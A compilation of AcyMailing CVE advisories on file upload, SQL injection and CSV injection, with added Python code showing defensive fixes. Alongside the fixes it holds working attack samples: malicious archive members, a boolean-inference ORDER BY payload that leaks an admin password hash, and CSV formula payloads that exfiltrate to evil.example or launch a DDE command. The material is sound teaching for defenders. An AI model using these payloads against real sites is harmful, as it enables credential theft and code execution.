CVE-2024-7384 – AcyMailing <= 9.7.2 - Authenticated (Subscriber+) Arbitrary File Upload via acym_extractArchive Function
https://notcve.org/view.php?id=CVE-2024-7384
The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin is vulnerable to arbitrary file upload in all versions up to and including 9.7.2, because the acym_extractArchive function does not validate the file types of the archive members it writes to disk. An authenticated attacker with Subscriber-level access or above can therefore place arbitrary files on the server, which may lead to remote code execution. Subscriber is the lowest WordPress role, so on a site with open registration this prerequisite is trivial to meet. The fix is in the referenced changeset; the diff of back/libraries/wordpress/file.php shows the added check.
• https://plugins.trac.wordpress.org/browser/acymailing/trunk/back/libraries/wordpress/file.php#L47 https://plugins.trac.wordpress.org/changeset/3137644 https://plugins.trac.wordpress.org/changeset?old_path=%2Facymailing&old=3118953&new_path=%2Facymailing&new=3137644&sfp_email=&sfph_mail= https://wordpress.org/plugins/acymailing/#developers https://www.acymailing.com/changelog https://www.wordfence.com/threat-intel/vulnerabilities/id/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=cve • CWE-434: Unrestricted Upload of File with Dangerous Type •
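The bug class above is an archive extractor that trusts member names. The following is an added example, not AcyMailing's code and not the vendor's patch, of how an extractor should validate each member before writing it: an extension allowlist applied to every dotted suffix (so shell.php.jpg and .htaccess are refused along with shell.php), a path traversal check, a symlink check, and an independent containment check on the resolved destination path. The allowlist and the sample archive are constructed for the example.

```python
import io
import os
import posixpath
import stat
import tempfile
import zipfile
from typing import Dict, List

# Extensions a newsletter importer might legitimately need (an assumed allowlist,
# not AcyMailing's). Anything else, including .php and .phtml, is rejected.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "css", "html", "txt"}


def member_verdict(name: str, allowed=ALLOWED_EXTENSIONS) -> str:
    """Return 'ok' if an archive entry may be written, otherwise the reason it may not.

    Every dotted suffix is checked, so 'shell.php.jpg' is rejected along with
    'shell.php' (some Apache AddHandler configurations execute double extensions),
    and dotfiles such as .htaccess are rejected because nothing precedes the dot.
    """
    if not name or "\\" in name or name.startswith("/"):
        return "empty, absolute or backslash path"
    normalized = posixpath.normpath(name)
    if normalized == ".." or normalized.startswith("../"):
        return "path traversal"
    parts = posixpath.basename(normalized).split(".")
    if len(parts) < 2 or parts[0] == "":
        return "dotfile or missing extension"
    for ext in parts[1:]:
        if ext.lower() not in allowed:
            return f"disallowed extension .{ext}"
    return "ok"


def extract_archive(data: bytes, dest: str, allowed=ALLOWED_EXTENSIONS) -> Dict[str, List[str]]:
    """Extract only validated regular files under dest; report what was written and refused."""
    result: Dict[str, List[str]] = {"extracted": [], "rejected": []}
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue  # directories are created implicitly for accepted files
            if stat.S_ISLNK(info.external_attr >> 16):
                result["rejected"].append(f"{info.filename}: symlink")
                continue
            verdict = member_verdict(info.filename, allowed)
            if verdict != "ok":
                result["rejected"].append(f"{info.filename}: {verdict}")
                continue
            # Second, independent containment check on the fully resolved path.
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                result["rejected"].append(f"{info.filename}: escapes destination")
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            result["extracted"].append(info.filename)
    return result


def build_sample_archive() -> bytes:
    """Constructed test archive mixing legitimate assets with the usual upload tricks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("images/logo.png", b"\x89PNG\r\n\x1a\n")
        zf.writestr("template.html", b"<p>newsletter</p>")
        zf.writestr("shell.php", b"<?php /* would run server-side if written */ ?>")
        zf.writestr("backdoor.php.jpg", b"<?php /* double extension */ ?>")
        zf.writestr("../outside.txt", b"escaped the upload directory")
        zf.writestr(".htaccess", b"AddType application/x-httpd-php .jpg")
    return buf.getvalue()


def demo() -> Dict[str, List[str]]:
    """Extract the sample archive into a scratch directory and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return extract_archive(build_sample_archive(), tmp)


if __name__ == "__main__":
    for key, items in demo().items():
        print(key, items)
```

Two of the six members survive (images/logo.png and template.html); the rest are refused with a reason. The realpath containment check is deliberately redundant with the name check: extractors have been bypassed before by a name encoding the first check did not anticipate, and the second check costs nothing.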
CVE-2023-39970 – Extension - acymailing.com - RCE in AcyMailing component for Joomla 6.7.0-8.5.0
https://notcve.org/view.php?id=CVE-2023-39970
Unrestricted Upload of File with Dangerous Type vulnerability in the AcyMailing component for Joomla, affecting versions 6.7.0 through 8.5.0. It allows remote code execution.
• https://extensions.joomla.org/extension/acymailing-starter • CWE-434: Unrestricted Upload of File with Dangerous Type •
CVE-2020-10934
https://notcve.org/view.php?id=CVE-2020-10934
Acyba AcyMailing before 6.9.2 mishandles files uploaded by administrators. Since the upload requires an admin account, the practical impact is that a compromised or malicious administrator can turn application-level access into code execution on the web server; it does not lower the bar for unprivileged users.
• http://jvn.jp/en/jp/JVN56890693/index.html https://www.acyba.com/acymailing/68-acymailing-changelog.html?Itemid=329 • CWE-434: Unrestricted Upload of File with Dangerous Type •
CVE-2015-7338
https://notcve.org/view.php?id=CVE-2015-7338
SQL injection exists in the AcyMailing Joomla component before 4.9.5 via the exportgeolocorder parameter in a geolocation_longitude request to index.php.
• https://labs.integrity.pt/advisories/cve-2015-7338 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
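The advisory gives no detail beyond the parameter names. As an added example, not AcyMailing's code and not a reproduction of this CVE, the block below illustrates the class with an assumed export sort parameter, because an ORDER BY clause is one place where the usual advice "use bound parameters" does not apply: ORDER BY takes an expression, not a value, so the only fix is an allowlist. The schema, table contents and column names are constructed for the example; the boolean-inference payload is the standard technique for this injection position.

```python
import sqlite3
from typing import Dict, List

# Sort keys the export endpoint accepts, mapped to real column names. The schema is
# assumed for this example and is not AcyMailing's.
ORDER_COLUMNS = {
    "id": "sub_id",
    "longitude": "geolocation_longitude",
    "latitude": "geolocation_latitude",
}


def setup_db() -> sqlite3.Connection:
    """Constructed sample data: three subscribers plus a table the attacker wants to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE subscribers (sub_id INTEGER, email TEXT,
                                  geolocation_longitude REAL, geolocation_latitude REAL);
        INSERT INTO subscribers VALUES (1, 'a@example.com', 10.0, 50.0);
        INSERT INTO subscribers VALUES (2, 'b@example.com', 20.0, 40.0);
        INSERT INTO subscribers VALUES (3, 'c@example.com', 30.0, 30.0);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$examplehash');
        """
    )
    return conn


def export_unsafe(conn: sqlite3.Connection, order: str) -> List[int]:
    """Vulnerable pattern: the request parameter is concatenated into ORDER BY."""
    return [row[0] for row in conn.execute("SELECT sub_id FROM subscribers ORDER BY " + order)]


def export_safe(conn: sqlite3.Connection, order: str) -> List[int]:
    """Fixed pattern: the parameter only selects from an allowlist; anything else is refused."""
    column = ORDER_COLUMNS.get(order)
    if column is None:
        raise ValueError(f"unsupported order key: {order!r}")
    return [row[0] for row in conn.execute(f"SELECT sub_id FROM subscribers ORDER BY {column}")]


def oracle_payload(condition: str) -> str:
    """Boolean-inference payload for an ORDER BY injection point.

    When the condition is true the rows sort by longitude (ids ascending here);
    when false they sort by latitude (ids descending). The attacker reads the
    answer from the row order alone, so no error message or UNION is needed.
    """
    return f"CASE WHEN ({condition}) THEN geolocation_longitude ELSE geolocation_latitude END"


def safe_rejects(conn: sqlite3.Connection, order: str) -> bool:
    """True if the allowlisted exporter refuses the given order parameter."""
    try:
        export_safe(conn, order)
    except ValueError:
        return True
    return False


def run_demo() -> Dict[str, object]:
    """Show the oracle against the unsafe exporter and the allowlist refusing the same input."""
    conn = setup_db()
    admin_hash_prefix = "(SELECT substr(password, 1, 4) FROM users WHERE username = 'admin')"
    probe_true = oracle_payload(f"{admin_hash_prefix} = '$2y$'")
    probe_false = oracle_payload(f"{admin_hash_prefix} = 'zzzz'")
    return {
        "unsafe_true": export_unsafe(conn, probe_true),
        "unsafe_false": export_unsafe(conn, probe_false),
        "safe_longitude": export_safe(conn, "longitude"),
        "safe_rejects_payload": safe_rejects(conn, probe_true),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The two probes return [1, 2, 3] and [3, 2, 1] respectively, which is exactly one bit of the admin's password hash leaked per request; repeating with different substr offsets and candidate characters extracts the whole column. The safe variant never sees the attacker's string as SQL at all.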
CVE-2018-9107 – Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
https://notcve.org/view.php?id=CVE-2018-9107
CSV injection (also known as Excel Macro Injection or Formula Injection) exists in the export feature of the Acyba AcyMailing extension before 5.9.6 for Joomla!, via a value that is mishandled in a CSV export. The Joomla AcyMailing Starter component version 5.9.5 suffers from this CSV macro injection vulnerability. The risk is on the administrator's side: a subscriber-supplied field that begins with a formula character is evaluated when the exported CSV is opened in a spreadsheet, which can exfiltrate other cells or, via DDE on older Excel versions, run a command on the admin's workstation.
• https://www.exploit-db.com/exploits/44369 https://vel.joomla.org/articles/2140-introducing-csv-injection https://vel.joomla.org/resolved/2136-acymailing-5-9-5-csv-injection https://www.acyba.com/acymailing/change-log.html • CWE-1236: Improper Neutralization of Formula Elements in a CSV File •
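As an added example, not AcyMailing's code and not the vendor's fix, the block below shows the neutralization a CSV export needs on top of ordinary CSV quoting: a cell that starts with a formula trigger (=, +, -, @, tab, carriage return) is prefixed with a single quote so the spreadsheet imports it as text, leading whitespace is skipped before the check, and genuine numbers pass through unchanged so a negative coordinate stays numeric. The subscriber records and the payloads in them are constructed for the example.

```python
import csv
import io
from typing import Iterable, Sequence

# Characters that make a spreadsheet treat a cell as a formula (or DDE command) on import.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return a cell string that spreadsheets will import as inert text.

    Real numbers pass through unchanged, so a negative longitude stays numeric.
    For strings, leading whitespace is skipped before the check (so ' =1+1' is
    still caught) and a leading trigger is defanged by prefixing a single quote,
    which Excel and LibreOffice interpret as 'this cell is text'.
    """
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(header: Sequence[str], rows: Iterable[Sequence[object]]) -> str:
    """Write a CSV export where every user-controlled cell has been neutralized.

    The csv module handles quoting of embedded commas, quotes and newlines; the
    neutralization handles what the csv module does not know about, namely how
    a spreadsheet will interpret the cell's first character.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed subscriber records: one benign, two with formula payloads in the
# name field (which a subscriber controls through the signup form).
SAMPLE_HEADER = ("email", "name", "longitude")
SAMPLE_ROWS = [
    ("alice@example.com", "Alice", 10.5),
    ("mallory@example.com", '=HYPERLINK("http://evil.example/?"&A2,"Click me")', -3.25),
    ("bob@example.com", "-2+3+cmd|' /C calc'!A0", 0.0),
]


def demo_export() -> str:
    """Export the sample records with neutralization applied."""
    return export_csv(SAMPLE_HEADER, SAMPLE_ROWS)


if __name__ == "__main__":
    print(demo_export())
```

The quote prefix is the OWASP-recommended defang and is what most export libraries apply; its cost is that consumers other than spreadsheets will see a literal leading apostrophe, so apply it only to string cells and keep numeric columns typed, as above.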